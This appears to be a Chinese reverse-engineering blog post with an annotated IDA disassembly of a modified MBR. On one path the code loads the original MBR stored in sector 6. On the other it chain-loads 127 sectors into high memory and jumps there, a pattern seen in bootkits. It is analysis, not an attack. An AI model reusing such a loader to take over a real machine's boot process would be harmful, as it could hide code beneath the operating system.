不多说,win-hex先把有用的复制出来
回来之后ida开始反汇编
反汇编的时候ida提示不知道入口,直接分析就可以,文件时直接转载在7c00地址的
分析完一部分之后ida停止了,因为它不知道正确的跳转,人工分析,发现相当于就是向下继续执行,让ida继续分析。
人工分析代码,已经标上了注释,代码贴在下面
seg000:0100 ; seg000:0100 ; +-------------------------------------------------------------------------+ seg000:0100 ; | This file has been generated by The Interactive Disassembler (IDA) | seg000:0100 ; | Copyright (c) 2009 by Hex-Rays,| seg000:0100 ; | License info: 77-4B83-901C-A6 | seg000:0100 ; | Licensed User | seg000:0100 ; +-------------------------------------------------------------------------+ seg000:0100 ; seg000:0100 ; Input MD5 : 9A4CD7E035BD114990C4EE31EDAD9296 seg000:0100 seg000:0100 ; --------------------------------------------------------------------------- seg000:0100 ; File Name : F:\datas\mbr.bin seg000:0100 ; Format : Binary file seg000:0100 ; Base Address: 7C00h Range: 7C100h - 7C300h Loaded length: 0200h seg000:0100 seg000:0100 .686p seg000:0100 .mmx seg000:0100 .model flat seg000:0100 seg000:0100 ; =========================================================================== seg000:0100 seg000:0100 ; Segment type: Pure code seg000:0100 seg000 segment byte public 'CODE' use16 seg000:0100 assume cs:seg000 seg000:0100 ;org 100h seg000:0100 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing seg000:0100 cli seg000:0101 xor ax, ax seg000:0103 mov ss, ax seg000:0105 mov sp, 7C00h seg000:0108 mov si, sp seg000:010A push ax seg000:010B pop es seg000:010C push ax seg000:010D pop ds seg000:010E sti seg000:010F cld seg000:0110 mov di, 600h seg000:0113 mov cx, 100h seg000:0116 rep movsw ; 复制自己到6100h seg000:0118 jmp far ptr 0:61Dh ; 跳转之后继续运行 seg000:011D ; --------------------------------------------------------------------------- seg000:011D xor ax, ax seg000:011F mov es, ax seg000:0121 mov cl, es:234h ; 读取中断向量表 seg000:0121 ; 获得8D中断 seg000:0126 cmp cl, 1 seg000:0129 mov byte ptr es:234h, 1 seg000:012F jnz short loc_7C14C ; 如果cl!=1就让cl等于1之后跳转 seg000:0131 mov ax, 0 seg000:0134 mov es, ax seg000:0136 mov ax, 201h seg000:0139 mov bx, 7C00h ; 读取在第六扇区的真正的mbr seg000:013C mov cx, 6 seg000:013F mov dx, 80h ; '€' seg000:0142 int 13h ; DISK - READ SECTORS INTO MEMORY seg000:0142 ; AL = number of sectors to read, CH = track, CL = sector seg000:0142 ; DH = head, DL = drive, ES:BX -> buffer to fill seg000:0142 ; Return: CF set on error, AH = status, AL = number of sectors read seg000:0144 jb short loc_7C19F ; io错误则跳转 seg000:0146 mov di, 7C00h seg000:0149 push es seg000:014A push di seg000:014B retf seg000:014C ; --------------------------------------------------------------------------- seg000:014C seg000:014C loc_7C14C: ; CODE XREF: seg000:012Fj seg000:014C mov ax, 3000h seg000:014F rol eax, 10h seg000:0153 mov ax, 100h seg000:0156 push eax ; ax=300100 seg000:0158 xor bx, bx seg000:015A mov es, bx seg000:015C mov si, 7B4h ; struct DiskAddressPacket seg000:015C ; { seg000:015C ; BYTE PacketSize; // 数据包尺寸(16字节) 0x7a4 seg000:015C ; BYTE Reserved; // ==0 0x7a5 seg000:015C ; WORD BlockCount; // 要传输的数据块个数(以扇区为单位) 0x7a6 seg000:015C ; DWORD BufferAddr; // 传输缓冲地址(segment:offset) 0x7a8 seg000:015C ; QWORD BlockNum; // 磁盘起始绝对块地址 0x7ac seg000:015C ; }; seg000:015F mov ebx, cs:[si] seg000:0163 mov si, 7A4h seg000:0166 mov word ptr cs:[si], 10h ; DiskAddressPacket.PacketSize=16; seg000:016B mov word ptr cs:[si+2], 7Fh ; '' ; DiskAddressPacket.BlockCount=127 seg000:0171 mov cs:[si+4], eax ; .BufferAddr=0x300100 seg000:0176 mov cs:[si+8], ebx seg000:017B mov dword ptr cs:[si+0Ch], 0 seg000:0184 mov dl, 80h ; '€' seg000:0186 mov ah, 42h ; 'B' seg000:0188 xor al, al ; 磁盘块读取 seg000:0188 ; AH = 42h seg000:0188 ; DL = 驱动器号 seg000:0188 ; DS:DI = 磁盘地址数据包(Disk Address Packet) seg000:0188 ; seg000:0188 ; 返回: seg000:0188 ; CF = 0,AH = 0 成功 seg000:0188 ; CF = 1,AH = 错误码 seg000:0188 ; seg000:0188 ; 这个调用将磁盘上的数据读入内存。如果出现错误,DAP 的 BlockCount项中则记录了出错前实际读取的数据块个数。 seg000:018A int 13h ; DISK - seg000:018C jb short loc_7C19F ; 错误信息 seg000:018E pop ebx seg000:0190 push ebx seg000:0192 shr ebx, 10h ; ebx=0x30010 seg000:0196 mov es, bx ; es=0x10 seg000:0198 mov byte ptr es:124h, 1 seg000:019E retf seg000:019F ; --------------------------------------------------------------------------- seg000:019F seg000:019F loc_7C19F: ; CODE XREF: seg000:0144j seg000:019F ; seg000:018Cj seg000:019F mov si, 6DFh ; 错误信息 seg000:01A2 seg000:01A2 loc_7C1A2: ; CODE XREF: seg000:01B0j seg000:01A2 lodsb ; putch(si); seg000:01A3 cmp al, 0 seg000:01A5 jz short loc_7C1B2 ; delay() seg000:01A7 push si seg000:01A8 mov bx, 7 seg000:01AB mov ah, 0Eh seg000:01AD int 10h ; - VIDEO - WRITE CHARACTER AND ADVANCE CURSOR (TTY WRITE) seg000:01AD ; AL = character, BH = display page (alpha modes) seg000:01AD ; BL = foreground color (graphics modes) seg000:01AF pop si seg000:01B0 jmp short loc_7C1A2 ; putch(si); seg000:01B2 ; --------------------------------------------------------------------------- seg000:01B2 seg000:01B2 loc_7C1B2: ; CODE XREF: seg000:01A5j seg000:01B2 push ecx ; delay() seg000:01B4 mov ecx, 0FFFFFFFFh seg000:01BA seg000:01BA loc_7C1BA: ; CODE XREF: seg000:01C4j seg000:01BA cmp ecx, 0 seg000:01BE jz short loc_7C1C6 ; 对于硬件的一些操作,基本属于错误处理,无视就好 seg000:01C0 sub ecx, 1 seg000:01C4 jmp short loc_7C1BA seg000:01C6 ; --------------------------------------------------------------------------- seg000:01C6 seg000:01C6 loc_7C1C6: ; CODE XREF: seg000:01BEj seg000:01C6 push dx ; 对于硬件的一些操作,基本属于错误处理,无视就好 seg000:01C7 push ax seg000:01C8 mov dx, 64h ; 'd' seg000:01CB mov al, 0FEh ; '? seg000:01CD out dx, al ; AT Keyboard controller 8042. seg000:01CD ; Resend the last transmission seg000:01CE in al, 92h seg000:01D0 or al, 1 seg000:01D2 out 92h, al ; 打开A20地址线,可以访问高端内存 seg000:01D4 mov dx, 0CF9h seg000:01D7 in al, dx seg000:01D8 or al, 6 seg000:01DA out dx, al ; 把按键和reboot关联起来 seg000:01DB pop ax seg000:01DC pop dx seg000:01DD seg000:01DD loc_7C1DD: ; CODE XREF: seg000:loc_7C1DDj seg000:01DD jmp short loc_7C1DD ; 死循环 seg000:01DD ; --------------------------------------------------------------------------- seg000:01DF aReadDiskFailed db 'Read disk failed!',0Dh,0Ah,0 seg000:01F3 db 0 seg000:01F4 db 0 seg000:01F5 db 0 seg000:01F6 db 0 seg000:01F7 db 0 seg000:01F8 db 0 seg000:01F9 db 0 seg000:01FA db 0 seg000:01FB db 0 seg000:01FC db 0 seg000:01FD db 0 seg000:01FE db 0 seg000:01FF db 0 seg000:0200 db 0 seg000:0201 db 0 seg000:0202 db 0 seg000:0203 db 0 seg000:0204 db 0 seg000:0205 db 0 seg000:0206 db 0 seg000:0207 db 0 seg000:0208 db 0 seg000:0209 db 0 seg000:020A db 0 seg000:020B db 0 seg000:020C db 0 seg000:020D db 0 seg000:020E db 0 seg000:020F db 0 seg000:0210 db 0 seg000:0211 db 0 seg000:0212 db 0 seg000:0213 db 0 seg000:0214 db 0 seg000:0215 db 0 seg000:0216 db 0 seg000:0217 db 0 seg000:0218 db 0 seg000:0219 db 0 seg000:021A db 0 seg000:021B db 0 seg000:021C db 0 seg000:021D db 0 seg000:021E db 0 seg000:021F db 0 seg000:0220 db 0 seg000:0221 db 0 seg000:0222 db 0 seg000:0223 db 0 seg000:0224 db 0 seg000:0225 db 0 seg000:0226 db 0 seg000:0227 db 0 seg000:0228 db 0 seg000:0229 db 0 seg000:022A db 0 seg000:022B db 0 seg000:022C db 0 seg000:022D db 0 seg000:022E db 0 seg000:022F db 0 seg000:0230 db 0 seg000:0231 db 0 seg000:0232 db 0 seg000:0233 db 0 seg000:0234 db 0 seg000:0235 db 0 seg000:0236 db 0 seg000:0237 db 0 seg000:0238 db 0 seg000:0239 db 0 seg000:023A db 0 seg000:023B db 0 seg000:023C db 0 seg000:023D db 0 seg000:023E db 0 seg000:023F db 0 seg000:0240 db 0 seg000:0241 db 0 seg000:0242 db 0 seg000:0243 db 0 seg000:0244 db 0 seg000:0245 db 0 seg000:0246 db 0 seg000:0247 db 0 seg000:0248 db 0 seg000:0249 db 0 seg000:024A db 0 seg000:024B db 0 seg000:024C db 0 seg000:024D db 0 seg000:024E db 0 seg000:024F db 0 seg000:0250 db 0 seg000:0251 db 0 seg000:0252 db 0 seg000:0253 db 0 seg000:0254 db 0 seg000:0255 db 0 seg000:0256 db 0 seg000:0257 db 0 seg000:0258 db 0 seg000:0259 db 0 seg000:025A db 0 seg000:025B db 0 seg000:025C db 0 seg000:025D db 0 seg000:025E db 0 seg000:025F db 0 seg000:0260 db 0 seg000:0261 db 0 seg000:0262 db 0 seg000:0263 db 0 seg000:0264 db 0 seg000:0265 db 0 seg000:0266 db 0 seg000:0267 db 0 seg000:0268 db 0 seg000:0269 db 0 seg000:026A db 0 seg000:026B db 0 seg000:026C db 0 seg000:026D db 0 seg000:026E db 0 seg000:026F db 0 seg000:0270 db 0 seg000:0271 db 0 seg000:0272 db 0 seg000:0273 db 0 seg000:0274 db 0 seg000:0275 db 0 seg000:0276 db 0 seg000:0277 db 0 seg000:0278 db 0 seg000:0279 db 0 seg000:027A db 0 seg000:027B db 0 seg000:027C db 0 seg000:027D db 0 seg000:027E db 0 seg000:027F db 0 seg000:0280 db 0 seg000:0281 db 0 seg000:0282 db 0 seg000:0283 db 0 seg000:0284 db 0 seg000:0285 db 0 seg000:0286 db 0 seg000:0287 db 0 seg000:0288 db 0 seg000:0289 db 0 seg000:028A db 0 seg000:028B db 0 seg000:028C db 0 seg000:028D db 0 seg000:028E db 0 seg000:028F db 0 seg000:0290 db 0 seg000:0291 db 0 seg000:0292 db 0 seg000:0293 db 0 seg000:0294 db 0 seg000:0295 db 0 seg000:0296 db 0 seg000:0297 db 0 seg000:0298 db 0 seg000:0299 db 0 seg000:029A db 0 seg000:029B db 0 seg000:029C db 0 seg000:029D db 0 seg000:029E db 0 seg000:029F db 0 seg000:02A0 db 0 seg000:02A1 db 0 seg000:02A2 db 0 seg000:02A3 db 0 seg000:02A4 db 0 seg000:02A5 db 0 seg000:02A6 db 0 seg000:02A7 db 0 seg000:02A8 db 0 seg000:02A9 db 0 seg000:02AA db 0 seg000:02AB db 0 seg000:02AC db 0 seg000:02AD db 0 seg000:02AE db 0 seg000:02AF db 0 seg000:02B0 db 0 seg000:02B1 db 0 seg000:02B2 db 0 seg000:02B3 db 0 seg000:02B4 db 0BCh ; ? seg000:02B5 db 0ABh ; ? seg000:02B6 db 0AFh ; ? seg000:02B7 db 0Ch seg000:02B8 db 39h ; 9 seg000:02B9 db 0E7h ; ? seg000:02BA db 52h ; R seg000:02BB db 7Fh ; seg000:02BC db 0 seg000:02BD db 1 seg000:02BE db 80h ; € seg000:02BF db 1 seg000:02C0 db 1 seg000:02C1 db 0 seg000:02C2 db 7 seg000:02C3 db 0FEh ; ? seg000:02C4 db 3Fh ; ? seg000:02C5 db 0FFh seg000:02C6 db 3Fh ; ? seg000:02C7 db 0 seg000:02C8 db 0 seg000:02C9 db 0 seg000:02CA db 89h ; ? seg000:02CB db 0F7h ; ? seg000:02CC db 33h ; 3 seg000:02CD db 0Ch seg000:02CE db 0 seg000:02CF db 0FEh ; ? seg000:02D0 db 3Fh ; ? seg000:02D1 db 0FFh seg000:02D2 db 7 seg000:02D3 db 0FEh ; ? seg000:02D4 db 3Fh ; ? seg000:02D5 db 0FFh seg000:02D6 db 8 seg000:02D7 db 11h seg000:02D8 db 0B1h ; ? seg000:02D9 db 35h ; 5 seg000:02DA db 70h ; p seg000:02DB db 6 seg000:02DC db 85h ; ? seg000:02DD db 4 seg000:02DE db 0 seg000:02DF db 0 seg000:02E0 db 0 seg000:02E1 db 0 seg000:02E2 db 0 seg000:02E3 db 0 seg000:02E4 db 0 seg000:02E5 db 0 seg000:02E6 db 0 seg000:02E7 db 0 seg000:02E8 db 0 seg000:02E9 db 0 seg000:02EA db 0 seg000:02EB db 0 seg000:02EC db 0 seg000:02ED db 0 seg000:02EE db 0 seg000:02EF db 0 seg000:02F0 db 0 seg000:02F1 db 0 seg000:02F2 db 0 seg000:02F3 db 0 seg000:02F4 db 0 seg000:02F5 db 0 seg000:02F6 db 0 seg000:02F7 db 0 seg000:02F8 db 0 seg000:02F9 db 0 seg000:02FA db 0 seg000:02FB db 0 seg000:02FC db 0 seg000:02FD db 0 seg000:02FE db 55h ; U seg000:02FF db 0AAh ; ? seg000:02FF seg000 ends seg000:02FF seg000:02FF seg000:02FF end